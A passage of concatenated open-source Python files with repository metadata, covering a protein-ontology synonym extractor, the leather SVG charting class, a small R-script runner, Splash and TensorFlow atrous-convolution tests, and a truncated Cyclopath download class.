special_chars = {'(', ')', '[', ']', '{', '}', ','}
num_special_chars = sum(cnt.get(c, 0) for c in special_chars)
return num_special_chars < 6
def mod_filter(txt):
return "MOD:" not in txt
def is_derived_from(pro_id, data):
if not re.match(r'^PR:(\d+)$', pro_id):
return False
relationship = data.get('relationship', [])
if any(re.match(r'derives\_from PR:', rel) for rel in relationship):
return True
return False
def isa_cleavage_product(pro_id, data, g):
isa = data.get('is_a', [])
for node_id in isa:
if 'proteolytic cleavage product' in g.nodes[node_id]['name']:
return True
return False
def is_cleavage_and_modification(data):
comments = data.get('comment')
definition = data.get('def')
if comments is None or definition is None:
return False
return re.match(r'Category\=modification', comments) and ('cleavage' in definition)
def accept_entry(name, synonym, pro_id, data):
# Sanity check filters
if not (length_filter(synonym) and character_filter(synonym) and \
mod_filter(synonym)):
return False
    # Remove entries like "YWHAB/ClvPrd"; these are not useful
    # synonyms.
if re.match(r'^([^/]+)/(ClvPrd|UnMod|iso:\d+/UnMod)$', synonym):
return False
# Remove synonyms like UniProtKB:P0DTD1, 5325-5925
if re.match(r'^UniProtKB:([^ ]+)', synonym):
return False
# Finds guaranteed protein cleavages from relationship tag
if is_derived_from(pro_id, data):
return True
# Experimental Filter for finding additional cleavages
if is_cleavage_and_modification(data):
return True
if isa_cleavage_product(pro_id, data, g):
return True
return False
def read_cached_url(url, cache_file):
if not os.path.exists(cache_file):
print('Loading %s' % url)
g = obonet.read_obo(url)
with open(cache_file, 'wb') as fh:
pickle.dump(g, fh)
return g
else:
print('Loading %s' % cache_file)
with open(cache_file, 'rb') as fh:
return pickle.load(fh)
if __name__ == '__main__':
# Basic positioning
here = os.path.dirname(os.path.abspath(__file__))
kb_dir = os.path.join(here, os.pardir, 'src', 'main', 'resources', 'org',
'clulab', 'reach', 'kb')
resource_fname = os.path.join(kb_dir, 'protein-ontology-fragments.tsv')
# Download Protein Ontology resource file
url = 'https://proconsortium.org/download/current/pro_reasoned.obo'
g = read_cached_url(url, 'pro_obo.pkl')
allowed_synonyms = {'EXACT', 'RELATED'}
entries = []
for node, data in g.nodes(data=True):
name = data['name']
pro_id = node
raw_synonyms = data.get('synonym', [])
synonyms = get_synonyms(raw_synonyms)
# Format of the output defined here
entries += [(txt, pro_id) for txt in ([name] + synonyms)
if accept_entry(name, txt, pro_id, data)]
# We sort the entries first by the synonym but in a way that special
# characters and capitalization is ignored, then sort by ID
entries = sorted(entries, key=(lambda x:
(re.sub('[^A-Za-z0-9]', '', x[0]).lower(),
x[1])))
# Now dump the entries into an updated TSV file
with open(resource_fname, 'w', newline='') as fh:
writer = csv.writer(fh, delimiter="\t")
for entry in entries:
writer.writerow(entry)
| {
"content_hash": "1f407d885dd5c1181e3edb47ac80a300",
"timestamp": "",
"source": "github",
"line_count": 145,
"max_line_length": 87,
"avg_line_length": 29.055172413793102,
"alnum_prop": 0.597911227154047,
"repo_name": "clulab/bioresources",
"id": "a863240b507606eec6c16ab1068cb0a1d69828b1",
"size": "4213",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "scripts/update_protein_ontology.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Scala",
"bytes": "1941"
},
{
"name": "Shell",
"bytes": "675"
}
],
"symlink_target": ""
} |
from copy import copy
import os
import xml.etree.ElementTree as ET
import six
from leather.axis import Axis
from leather.data_types import Date, DateTime
from leather.scales import Scale, Linear, Temporal
from leather.series import Series, CategorySeries
from leather.shapes import Bars, Columns, Dots, Line
import leather.svg as svg
from leather import theme
from leather.utils import X, Y, DIMENSION_NAMES, Box, IPythonSVG, warn
class Chart(object):
"""
Container for all chart types.
:param title:
An optional title that will be rendered at the top of the chart.
"""
def __init__(self, title=None):
self._title = title
self._series_colors = theme.default_series_colors
self._layers = []
self._types = [None, None]
self._scales = [None, None]
self._axes = [None, None]
def _palette(self):
"""
Return a generator for series colors.
"""
return (color for color in self._series_colors)
def set_x_scale(self, scale):
"""
Set the X :class:`.Scale` for this chart.
"""
self._scales[X] = scale
def set_y_scale(self, scale):
"""
See :meth:`.Chart.set_x_scale`.
"""
self._scales[Y] = scale
def add_x_scale(self, domain_min, domain_max):
"""
Create and add a :class:`.Scale`.
If the provided domain values are :class:`date` or :class:`datetime`
        then a :class:`.Temporal` scale will be created; otherwise it will be
        :class:`.Linear`.
If you want to set a custom scale class use :meth:`.Chart.set_x_scale`
instead.
"""
scale_type = Linear
if isinstance(domain_min, Date.types) or isinstance(domain_min, DateTime.types):
scale_type = Temporal
self.set_x_scale(scale_type(domain_min, domain_max))
def add_y_scale(self, domain_min, domain_max):
"""
See :meth:`.Chart.add_x_scale`.
"""
scale_type = Linear
if isinstance(domain_min, Date.types) or isinstance(domain_min, DateTime.types):
scale_type = Temporal
self.set_y_scale(scale_type(domain_min, domain_max))
def set_x_axis(self, axis):
"""
Set an :class:`.Axis` class for this chart.
"""
self._axes[X] = axis
def set_y_axis(self, axis):
"""
See :meth:`.Chart.set_x_axis`.
"""
self._axes[Y] = axis
def add_x_axis(self, ticks=None, tick_formatter=None, name=None):
"""
Create and add an X :class:`.Axis`.
If you want to set a custom axis class use :meth:`.Chart.set_x_axis`
instead.
"""
self._axes[X] = Axis(ticks, tick_formatter, name)
def add_y_axis(self, ticks=None, tick_formatter=None, name=None):
"""
See :meth:`.Chart.add_x_axis`.
"""
self._axes[Y] = Axis(ticks, tick_formatter, name)
def add_series(self, series, shape):
"""
Add a data :class:`.Series` to the chart. The data types of the new
series must be consistent with any series that have already been added.
There are several shortcuts for adding different types of data series.
See :meth:`.Chart.add_bars`, :meth:`.Chart.add_columns`,
:meth:`.Chart.add_dots`, and :meth:`.Chart.add_line`.
"""
if self._layers and isinstance(self._layers[0][0], CategorySeries):
raise RuntimeError('Additional series can not be added to a chart with a CategorySeries.')
if isinstance(series, CategorySeries):
self._types = series._types
else:
for dim in [X, Y]:
if not self._types[dim]:
self._types[dim] = series._types[dim]
elif series._types[dim] is not self._types[dim]:
raise TypeError('Can\'t mix axis-data types: %s and %s' % (series._types[dim], self._types[dim]))
shape.validate_series(series)
self._layers.append((
series,
shape
))
def add_bars(self, data, x=None, y=None, name=None, fill_color=None):
"""
Create and add a :class:`.Series` rendered with :class:`.Bars`.
Note that when creating bars in this way the order of the series data
will be reversed so that the first item in the series is displayed
as the top-most bar in the graphic. If you don't want this to happen
use :meth:`.Chart.add_series` instead.
"""
self.add_series(
Series(list(reversed(data)), x=x, y=y, name=name),
Bars(fill_color)
)
def add_columns(self, data, x=None, y=None, name=None, fill_color=None):
"""
Create and add a :class:`.Series` rendered with :class:`.Columns`.
"""
self.add_series(
Series(data, x=x, y=y, name=name),
Columns(fill_color)
)
def add_dots(self, data, x=None, y=None, name=None, fill_color=None, radius=None):
"""
Create and add a :class:`.Series` rendered with :class:`.Dots`.
"""
self.add_series(
Series(data, x=x, y=y, name=name),
Dots(fill_color, radius)
)
def add_line(self, data, x=None, y=None, name=None, stroke_color=None, width=None):
"""
Create and add a :class:`.Series` rendered with :class:`.Line`.
"""
self.add_series(
Series(data, x=x, y=y, name=name),
Line(stroke_color, width)
)
def _validate_dimension(self, dimension):
"""
Validates that the given scale and axis are valid for the data that
has been added to this chart. If a scale or axis has not been set,
generates automated ones.
"""
scale = self._scales[dimension]
axis = self._axes[dimension]
if not scale:
scale = Scale.infer(self._layers, dimension, self._types[dimension])
else:
for series, shape in self._layers:
if not scale.contains(series.min(dimension)) or not scale.contains(series.max(dimension)):
d = DIMENSION_NAMES[dimension]
warn('Data contains values outside %s scale domain. All data points may not be visible on the chart.' % d)
# Only display once per axis
break
if not axis:
axis = Axis()
return (scale, axis)
def to_svg_group(self, width=None, height=None):
"""
Render this chart to an SVG group element.
This can then be placed inside an :code:`<svg>` tag to make a complete
SVG graphic.
See :meth:`.Chart.to_svg` for arguments.
"""
width = width or theme.default_width
height = height or theme.default_height
if not self._layers:
raise ValueError('You must add at least one series to the chart before rendering.')
if isinstance(theme.margin, float):
default_margin = width * theme.margin
margin = Box(
top=default_margin,
right=default_margin,
bottom=default_margin,
left=default_margin
)
        elif isinstance(theme.margin, int):
            margin = Box(theme.margin, theme.margin, theme.margin, theme.margin)
        elif isinstance(theme.margin, Box):
            margin = theme.margin
        else:
            margin = Box(*theme.margin)
# Root / background
root_group = ET.Element('g')
root_group.append(ET.Element('rect',
x=six.text_type(0),
y=six.text_type(0),
width=six.text_type(width),
height=six.text_type(height),
fill=theme.background_color
))
# Margins
margin_group = ET.Element('g')
margin_group.set('transform', svg.translate(margin.left, margin.top))
margin_width = width - (margin.left + margin.right)
margin_height = height - (margin.top + margin.bottom)
root_group.append(margin_group)
# Header
header_group = ET.Element('g')
header_margin = 0
if self._title:
label = ET.Element('text',
x=six.text_type(0),
y=six.text_type(0),
fill=theme.title_color
)
label.set('font-family', theme.title_font_family)
label.set('font-size', six.text_type(theme.title_font_size))
label.text = six.text_type(self._title)
header_group.append(label)
header_margin += theme.title_font_char_height + theme.title_gap
# Legend
if len(self._layers) > 1 or isinstance(self._layers[0][0], CategorySeries):
legend_group = ET.Element('g')
legend_group.set('transform', svg.translate(0, header_margin))
indent = 0
rows = 1
palette = self._palette()
for series, shape in self._layers:
for item_group, item_width in shape.legend_to_svg(series, palette):
if indent + item_width > width:
indent = 0
rows += 1
y = (rows - 1) * (theme.legend_font_char_height + theme.legend_gap)
item_group.set('transform', svg.translate(indent, y))
indent += item_width
legend_group.append(item_group)
legend_height = rows * (theme.legend_font_char_height + theme.legend_gap)
header_margin += legend_height
header_group.append(legend_group)
margin_group.append(header_group)
# Body
body_group = ET.Element('g')
body_group.set('transform', svg.translate(0, header_margin))
body_width = margin_width
body_height = margin_height - header_margin
margin_group.append(body_group)
# Axes
x_scale, x_axis = self._validate_dimension(X)
y_scale, y_axis = self._validate_dimension(Y)
bottom_margin = x_axis.estimate_label_margin(x_scale, 'bottom')
left_margin = y_axis.estimate_label_margin(y_scale, 'left')
canvas_width = body_width - left_margin
canvas_height = body_height - bottom_margin
axes_group = ET.Element('g')
axes_group.set('transform', svg.translate(left_margin, 0))
axes_group.append(x_axis.to_svg(canvas_width, canvas_height, x_scale, 'bottom'))
axes_group.append(y_axis.to_svg(canvas_width, canvas_height, y_scale, 'left'))
header_group.set('transform', svg.translate(left_margin, 0))
body_group.append(axes_group)
# Series
series_group = ET.Element('g')
palette = self._palette()
for series, shape in self._layers:
series_group.append(shape.to_svg(canvas_width, canvas_height, x_scale, y_scale, series, palette))
axes_group.append(series_group)
return root_group
def to_svg(self, path=None, width=None, height=None):
"""
Render this chart to an SVG document.
        The :code:`width` and :code:`height` are specified in SVG's
        "unitless" units; however, it is usually convenient to specify them
        as though they were pixels.
:param path:
Filepath or file-like object to write to. If omitted then the SVG
will be returned as a string. If running within IPython, then this
will return a SVG object to be displayed.
:param width:
The output width, in SVG user units. Defaults to
:data:`.theme.default_chart_width`.
:param height:
The output height, in SVG user units. Defaults to
:data:`.theme.default_chart_height`.
"""
width = width or theme.default_chart_width
height = height or theme.default_chart_height
root = ET.Element('svg',
width=six.text_type(width),
height=six.text_type(height),
version='1.1',
xmlns='http://www.w3.org/2000/svg'
)
group = self.to_svg_group(width, height)
root.append(group)
svg_text = svg.stringify(root)
close = True
if path:
f = None
try:
if hasattr(path, 'write'):
f = path
close = False
else:
dirpath = os.path.dirname(path)
if dirpath and not os.path.exists(dirpath):
os.makedirs(dirpath)
f = open(path, 'w')
f.write(svg.HEADER)
f.write(svg_text)
finally:
if close and f is not None:
f.close()
else:
return IPythonSVG(svg_text)
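# Minimal usage sketch (an addition, not part of leather's chart module): build
# a chart from (x, y) pairs with the helpers defined above and write it out as
# SVG. Wrapped in a function so that importing this module stays side-effect
# free.
def _example_chart(path='example.svg'):
    chart = Chart('Example')
    chart.add_line([(0, 1), (1, 3), (2, 2)])
    chart.to_svg(path)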
| {
"content_hash": "e46c7b7d0cbf777431724e75db07c774",
"timestamp": "",
"source": "github",
"line_count": 394,
"max_line_length": 126,
"avg_line_length": 32.66243654822335,
"alnum_prop": 0.5595617375087419,
"repo_name": "onyxfish/leather",
"id": "e27218344a8e4d2d09a291c9f41e6943e31a9834",
"size": "12892",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "leather/chart.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "82139"
},
{
"name": "Shell",
"bytes": "111"
}
],
"symlink_target": ""
} |
import subprocess
import optparse
import os
import sys
# TODO: Add Windows functionality.
SCRIPT_NAME = "picarro.R"
class ScriptException(Exception):
def __init__(self, returncode, stdout, stderr, script):
self.returncode = returncode
self.stdout = stdout
self.stderr = stderr
        self.script = script
        Exception.__init__(self, 'Error in script')
def run_bash(script):
    proc = subprocess.Popen(['bash','-c',script],
        stdout = subprocess.PIPE,
        stderr = subprocess.PIPE,
        stdin = subprocess.PIPE)
stdout, stderr = proc.communicate()
if proc.returncode:
raise ScriptException(proc.returncode, stdout, stderr, script)
return stdout, stderr
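# Illustrative usage sketch (an addition, never called by this script): run a
# one-off bash snippet and surface a non-zero exit status as ScriptException.
def _example_run_bash():
    try:
        run_bash("mkdir -p /tmp/picarro_example")
    except ScriptException as e:
        print "bash exited with status %d" % e.returncode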
# TODO: Add date ranges.
def run(foldername, filename, num_files):
try:
subprocess.call(["./" + SCRIPT_NAME] + [foldername, filename, num_files])
except OSError as e:
print "OS error({0}): {1}".format(e.errno, e.strerror)
def main():
remove_spaces = "find . -depth -name \'* *\' \
| while IFS= read -r f ; do mv -i \"$f\" \"$(dirname \"$f\")/$(basename \"$f\"|tr \' \' _)\" ; done"
usage = "usage: ./%s foldername experiment-data_filename [options]" % os.path.basename(sys.argv[0])
parser = optparse.OptionParser(usage = usage)
parser.add_option('-s','--spaces',action="store_true",dest="script",
help="remove spaces from all files and folders in [foldername]",default=False)
parser.add_option('-n','--numfiles',type="string",action="store",dest="num_files",
help="number of files in each folder.",default='15')
(options, args) = parser.parse_args()
if len(args) < 2:
parser.error("Incorrect number of arguments.\n Please specify a folder name and measurement file.")
elif len(args) > 3:
parser.error("Incorrect number of arguments.\n Too many arguments.")
else:
if options.script:
run_bash(remove_spaces)
run(args[0], args[1], options.num_files)
if __name__ == "__main__":
main()
| {
"content_hash": "437644f2a350ee57d145ee87e8dd2895",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 102,
"avg_line_length": 30.37704918032787,
"alnum_prop": 0.6702644360496492,
"repo_name": "wdonahoe/picarro",
"id": "ab530e88a0e9a3cace4743ec49f9bca00eec1cb5",
"size": "1872",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "picarro.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1872"
},
{
"name": "R",
"bytes": "8422"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import
import unittest
import pytest
lupa = pytest.importorskip("lupa")
from . import test_render, test_redirects, test_har
from .utils import NON_EXISTING_RESOLVABLE
class Base:
# a hack to skip test running from a mixin
class EmulationMixin(test_render.BaseRenderTest):
endpoint = 'execute'
def request(self, query, endpoint=None, headers=None, **kwargs):
            query = query or {}
query.update({'lua_source': self.script})
return self._get_handler().request(query, endpoint, headers, **kwargs)
def post(self, query, endpoint=None, payload=None, headers=None, **kwargs):
raise NotImplementedError()
# ==== overridden tests =============================
@unittest.skipIf(NON_EXISTING_RESOLVABLE, "non existing hosts are resolvable")
def test_render_error(self):
r = self.request({"url": "http://non-existent-host/"})
self.assertStatusCode(r, 400)
def test_self(self):
# make sure mixin order is correct
assert self.endpoint == 'execute'
class EmulatedRenderHtmlTest(Base.EmulationMixin, test_render.RenderHtmlTest):
script = 'main = require("emulation").render_html'
class EmulatedHttpRedirectTest(Base.EmulationMixin, test_redirects.HttpRedirectTest):
script = 'main = require("emulation").render_html'
class EmulatedJsRedirectTest(Base.EmulationMixin, test_redirects.JsRedirectTest):
script = 'main = require("emulation").render_html'
# Overridden to return 400.
@unittest.skipIf(NON_EXISTING_RESOLVABLE, "non existing hosts are resolvable")
def test_redirect_to_non_existing(self):
r = self.request({
"url": self.mockurl("jsredirect-non-existing"),
"wait": 2.,
})
self.assertStatusCode(r, 400)
class EmulatedMetaRedirectTest(Base.EmulationMixin, test_redirects.MetaRedirectTest):
script = 'main = require("emulation").render_html'
class EmulatedRenderPngTest(Base.EmulationMixin, test_render.RenderPngTest):
script = 'main = require("emulation").render_png'
@pytest.mark.xfail(
run=False,
reason="""
Range validation in lua renderer is not implemented and out of range values of
width/height will consume huge amount of memory either bringing down the test
server because of OOM killer or grinding user system to a halt because of swap.
""")
def test_range_checks(self):
super(EmulatedRenderPngTest, self).test_range_checks()
def test_extra_height_doesnt_leave_garbage_when_using_tiled_render(self):
# XXX: this function belongs to test_render, BUT height < 1000 is fixed
# in defaults and so is tile max size, so in order to force rendering
# that may produce extra pixels at the bottom we go the way that avoids
# parameter validation.
r = self.request({'url': self.mockurl('tall'), 'viewport': '100x100',
'height': 3000})
png = self.assertPng(r, height=3000)
# Ensure that the extra pixels at the bottom are transparent.
alpha_channel = png.crop((0, 100, 100, 3000)).getdata(3)
self.assertEqual(alpha_channel.size, (100, 2900))
self.assertEqual(alpha_channel.getextrema(), (0, 0))
class EmulatedRenderJpegTest(Base.EmulationMixin, test_render.RenderJpegTest):
script = 'main = require("emulation").render_jpeg'
@pytest.mark.xfail(
run=False,
reason="""
Range validation in lua renderer is not implemented and out of range values of
width/height will consume huge amount of memory either bringing down the test
server because of OOM killer or grinding user system to a halt because of swap.
""")
def test_range_checks(self):
super(EmulatedRenderJpegTest, self).test_range_checks()
def test_extra_height_doesnt_leave_garbage_when_using_tiled_render(self):
# XXX: this function belongs to test_render, BUT height < 1000 is fixed
# in defaults and so is tile max size, so in order to force rendering
# that may produce extra pixels at the bottom we go the way that avoids
# parameter validation.
r = self.request({'url': self.mockurl('tall'), 'viewport': '100x100',
'height': 3000})
img = self.assertJpeg(r, height=3000)
# Ensure that the extra pixels at the bottom are transparent.
box = img.crop((0, 100, 100, 3000))
self.assertEqual(box.size, (100, 2900))
# iterate over channels
for i in range(3):
self.assertEqual(box.getdata(i).getextrema(), (255, 255))
class EmulatedRenderHarTest(Base.EmulationMixin, test_har.HarRenderTest):
script = 'main = require("emulation").render_har'
| {
"content_hash": "0f2c5bae585f2bd7e895738378744429",
"timestamp": "",
"source": "github",
"line_count": 117,
"max_line_length": 86,
"avg_line_length": 40.957264957264954,
"alnum_prop": 0.669449081803005,
"repo_name": "kod3r/splash",
"id": "f857e25f875964a5362b2864a031a433cec755de",
"size": "4816",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "splash/tests/test_execute_emulation.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "307"
},
{
"name": "Lua",
"bytes": "20836"
},
{
"name": "Python",
"bytes": "537863"
},
{
"name": "Shell",
"bytes": "3747"
}
],
"symlink_target": ""
} |
"""Tests for convolution related functionality in tensorflow.ops.nn."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import nn_impl
from tensorflow.python.ops import nn_ops
import tensorflow.python.ops.nn_grad # pylint: disable=unused-import
from tensorflow.python.platform import test
def _upsample_filters(filters, rate):
"""Upsamples the filters by a factor of rate along the spatial dimensions.
Args:
filters: [h, w, in_depth, out_depth]. Original filters.
rate: An int, specifying the upsampling rate.
Returns:
filters_up: [h_up, w_up, in_depth, out_depth]. Upsampled filters with
h_up = h + (h - 1) * (rate - 1)
w_up = w + (w - 1) * (rate - 1)
containing (rate - 1) zeros between consecutive filter values along
the filters' spatial dimensions.
"""
if rate == 1:
return filters
# [h, w, in_depth, out_depth] -> [in_depth, out_depth, h, w]
filters_up = np.transpose(filters, [2, 3, 0, 1])
ker = np.zeros([rate, rate], dtype=np.float32)
ker[0, 0] = 1
filters_up = np.kron(filters_up, ker)[:, :, :-(rate - 1), :-(rate - 1)]
# [in_depth, out_depth, h_up, w_up] -> [h_up, w_up, in_depth, out_depth]
filters_up = np.transpose(filters_up, [2, 3, 0, 1])
return filters_up
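# Illustrative shape note (an addition, not part of the original test file):
# with rate=2, a [3, 3, in_depth, out_depth] filter grows to
# [3 + (3 - 1) * (2 - 1), 3 + (3 - 1) * (2 - 1), in_depth, out_depth], i.e.
# [5, 5, in_depth, out_depth], with zeros interleaved between the original
# taps. For example:
#   f = np.ones([3, 3, 1, 1], dtype=np.float32)
#   assert _upsample_filters(f, 2).shape == (5, 5, 1, 1)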
class AtrousConv2DTest(test.TestCase):
@test_util.run_deprecated_v1
def testAtrousConv2DForward(self):
with self.session():
# Input: [batch, height, width, input_depth]
height = 9
for width in [9, 10]: # Test both odd and even width.
x_shape = [2, height, width, 2]
x = np.arange(np.prod(x_shape), dtype=np.float32).reshape(x_shape)
# Filter: [kernel_height, kernel_width, input_depth, output_depth]
for kernel_height in range(1, 4):
for kernel_width in range(1, 4):
f_shape = [kernel_height, kernel_width, 2, 2]
f = np.arange(np.prod(f_shape), dtype=np.float32).reshape(f_shape)
for rate in range(1, 4):
f_up = _upsample_filters(f, rate)
for padding in ["SAME", "VALID"]:
y1 = nn_ops.atrous_conv2d(x, f, rate, padding=padding)
y2 = nn_ops.conv2d(
x, f_up, strides=[1, 1, 1, 1], padding=padding)
self.assertAllClose(y1, y2, rtol=1e-3, atol=1e-3)
@test_util.run_deprecated_v1
def testAtrousSequence(self):
"""Tests optimization of sequence of atrous convolutions.
Verifies that a sequence of `atrous_conv2d` operations with identical `rate`
    parameters, 'SAME' `padding`, and `filters` with odd heights/widths:
net = atrous_conv2d(net, filters1, rate, padding="SAME")
net = atrous_conv2d(net, filters2, rate, padding="SAME")
...
net = atrous_conv2d(net, filtersK, rate, padding="SAME")
is equivalent to:
pad = ... # padding so that the input dims are multiples of rate
net = space_to_batch(net, paddings=pad, block_size=rate)
net = conv2d(net, filters1, strides=[1, 1, 1, 1], padding="SAME")
net = conv2d(net, filters2, strides=[1, 1, 1, 1], padding="SAME")
...
net = conv2d(net, filtersK, strides=[1, 1, 1, 1], padding="SAME")
net = batch_to_space(net, crops=pad, block_size=rate)
"""
padding = "SAME" # The padding needs to be "SAME"
np.random.seed(1) # Make it reproducible.
with self.session():
# Input: [batch, height, width, input_depth]
for height in range(15, 17):
for width in range(15, 17):
x_shape = [3, height, width, 2]
x = np.random.random_sample(x_shape).astype(np.float32)
for kernel in [1, 3, 5]: # The kernel size needs to be odd.
# Filter: [kernel_height, kernel_width, input_depth, output_depth]
f_shape = [kernel, kernel, 2, 2]
f = 1e-2 * np.random.random_sample(f_shape).astype(np.float32)
for rate in range(2, 4):
# y1: three atrous_conv2d in a row.
y1 = nn_ops.atrous_conv2d(x, f, rate, padding=padding)
y1 = nn_ops.atrous_conv2d(y1, f, rate, padding=padding)
y1 = nn_ops.atrous_conv2d(y1, f, rate, padding=padding)
# y2: space_to_batch, three conv2d in a row, batch_to_space
pad_bottom = 0 if height % rate == 0 else rate - height % rate
pad_right = 0 if width % rate == 0 else rate - width % rate
pad = [[0, pad_bottom], [0, pad_right]]
y2 = array_ops.space_to_batch(x, paddings=pad, block_size=rate)
y2 = nn_ops.conv2d(y2, f, strides=[1, 1, 1, 1], padding=padding)
y2 = nn_ops.conv2d(y2, f, strides=[1, 1, 1, 1], padding=padding)
y2 = nn_ops.conv2d(y2, f, strides=[1, 1, 1, 1], padding=padding)
y2 = array_ops.batch_to_space(y2, crops=pad, block_size=rate)
self.assertAllClose(y1, y2, rtol=1e-2, atol=1e-2)
@test_util.run_deprecated_v1
def testGradient(self):
with self.session():
# Input: [batch, height, width, input_depth]
x_shape = [2, 5, 6, 2]
# Filter: [kernel_height, kernel_width, input_depth, output_depth]
f_shape = [3, 3, 2, 2]
# Output: [batch, height, width, output_depth]
y_shape = [2, 5, 6, 2]
np.random.seed(1) # Make it reproducible.
x_val = np.random.random_sample(x_shape).astype(np.float32)
f_val = np.random.random_sample(f_shape).astype(np.float32)
x = constant_op.constant(x_val, name="x", dtype=dtypes.float32)
f = constant_op.constant(f_val, name="f", dtype=dtypes.float32)
for rate in range(1, 4):
output = nn_ops.atrous_conv2d(x, f, rate=rate, padding="SAME")
err = gradient_checker.compute_gradient_error([x, f],
[x_shape, f_shape],
output, y_shape)
print("atrous_conv2d gradient err = %g " % err)
err_tolerance = 4e-3 if test_util.is_xla_enabled() else 1e-3
self.assertLess(err, err_tolerance)
class AtrousConv2DTransposeTest(test.TestCase):
@test_util.run_deprecated_v1
def testAtrousConv2DTransposeForward(self):
with self.session():
# Input: [batch, height, width, input_depth]
height = 9
for width in [9, 10]: # Test both odd and even width.
x_shape = [2, height, width, 2]
x = np.arange(np.prod(x_shape), dtype=np.float32).reshape(x_shape)
# Filter: [kernel_height, kernel_width, input_depth, output_depth]
for kernel_height in range(1, 4):
for kernel_width in range(1, 4):
f_shape = [kernel_height, kernel_width, 2, 2]
f = np.arange(np.prod(f_shape), dtype=np.float32).reshape(f_shape)
for rate in range(1, 4):
f_up = _upsample_filters(f, rate)
kernel_height_up = (kernel_height + (kernel_height - 1) *
(rate - 1))
kernel_width_up = kernel_width + (kernel_width - 1) * (rate - 1)
for padding in ["SAME", "VALID"]:
if padding == "SAME":
y_shape = [2, height, width, 2]
else:
y_shape = [
2, height + kernel_height_up - 1,
width + kernel_width_up - 1, 2
]
y1 = nn_ops.atrous_conv2d_transpose(x, f, y_shape, rate,
padding)
y2 = nn_ops.conv2d_transpose(
x, f_up, y_shape, strides=[1, 1, 1, 1], padding=padding)
self.assertAllClose(y1, y2, rtol=1e-3, atol=1e-3)
class AtrousDepthwiseConv2DTest(test.TestCase):
@test_util.run_deprecated_v1
def testAtrousDepthwiseConv2DForward(self):
strides = [1, 1, 1, 1]
with self.session():
# Input: [batch, height, width, input_depth]
height = 9
for width in [9, 10]: # Test both odd and even width.
x_shape = [2, height, width, 2]
x = np.arange(np.prod(x_shape), dtype=np.float32).reshape(x_shape)
# Filter: [kernel_height, kernel_width, input_depth, output_depth]
for kernel_height in range(1, 4):
for kernel_width in range(1, 4):
f_shape = [kernel_height, kernel_width, 2, 2]
f = np.arange(np.prod(f_shape), dtype=np.float32).reshape(f_shape)
for rate in range(1, 4):
f_up = _upsample_filters(f, rate)
for padding in ["SAME", "VALID"]:
y1 = nn_impl.depthwise_conv2d(
x, f, strides, padding, rate=[rate, rate])
y2 = nn_impl.depthwise_conv2d(x, f_up, strides, padding)
self.assertAllClose(y1, y2, rtol=1e-3, atol=1e-3)
if __name__ == "__main__":
test.main()
| {
"content_hash": "6eeabe6a30a6e91f32374680f2f0ce60",
"timestamp": "",
"source": "github",
"line_count": 219,
"max_line_length": 80,
"avg_line_length": 41.94063926940639,
"alnum_prop": 0.5790963527490474,
"repo_name": "annarev/tensorflow",
"id": "1aa0b0315f83dfb4cd6fe1449993060a362a9498",
"size": "9874",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tensorflow/python/kernel_tests/atrous_conv2d_test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "1286"
},
{
"name": "Batchfile",
"bytes": "9258"
},
{
"name": "C",
"bytes": "341894"
},
{
"name": "C#",
"bytes": "8446"
},
{
"name": "C++",
"bytes": "49343974"
},
{
"name": "CMake",
"bytes": "195286"
},
{
"name": "Dockerfile",
"bytes": "36386"
},
{
"name": "Go",
"bytes": "1253646"
},
{
"name": "HTML",
"bytes": "4681865"
},
{
"name": "Java",
"bytes": "863222"
},
{
"name": "Jupyter Notebook",
"bytes": "2604741"
},
{
"name": "LLVM",
"bytes": "6536"
},
{
"name": "Makefile",
"bytes": "52734"
},
{
"name": "Objective-C",
"bytes": "15650"
},
{
"name": "Objective-C++",
"bytes": "99243"
},
{
"name": "PHP",
"bytes": "1357"
},
{
"name": "Perl",
"bytes": "7536"
},
{
"name": "PureBasic",
"bytes": "25356"
},
{
"name": "Python",
"bytes": "41289329"
},
{
"name": "Ruby",
"bytes": "553"
},
{
"name": "Shell",
"bytes": "469612"
},
{
"name": "Smarty",
"bytes": "6976"
}
],
"symlink_target": ""
} |
import conf
import g
import os
import sys
from item import item_base
from item.jobsq import work_item
from item.util.item_type import Item_Type
__all__ = ['One', 'Many',]
log = g.log.getLogger('work_item_dl')
class One(work_item.One):
# Base class overrides
local_defns = [
]
attr_defns = work_item.One.attr_defns + local_defns
psql_defns = work_item.One.psql_defns + local_defns
gwis_defns = item_base.One.attr_defns_reduce_for_gwis(attr_defns)
__slots__ = [] + [attr_defn[0] for attr_defn in local_defns]
#
def __init__(self, qb=None, row=None, req=None, copy_from=None):
g.assurt(copy_from is None) # Not supported for this class.
work_item.One.__init__(self, qb, row, req, copy_from)
# *** Saving to the Database
#
def save_core(self, qb):
g.assurt(False) # Not supported
# ***
#
def get_zipname(self):
g.assurt(False)
class Many(work_item.Many):
one_class = One
# This is deliberately the same type as the base class.
# job_class = 'merge_job'
__slots__ = ()
# *** Constructor
def __init__(self):
work_item.Many.__init__(self)
# ***
#
def search_for_items(self, *args, **kwargs):
qb = self.query_builderer(*args, **kwargs)
work_item.Many.search_for_items(self, qb)
self.search_enforce_download_rules(qb)
#
def get_download_filename(self):
zpath = None
if len(self) != 1:
# This shouldn't happen unless the client has been hacked, right?
log.error('get_download_filename: too many or too few many: %d'
% (len(self),))
else:
wtem = self[0]
fbase = '%s.fin' % (wtem.local_file_guid,)
fpath = os.path.join(conf.shapefile_directory, fbase)
zbase = '%s.zip' % (wtem.get_zipname(),)
zpath = os.path.join(fpath, zbase)
# FIXME: I want to rename the zip so it's not a weird name that the
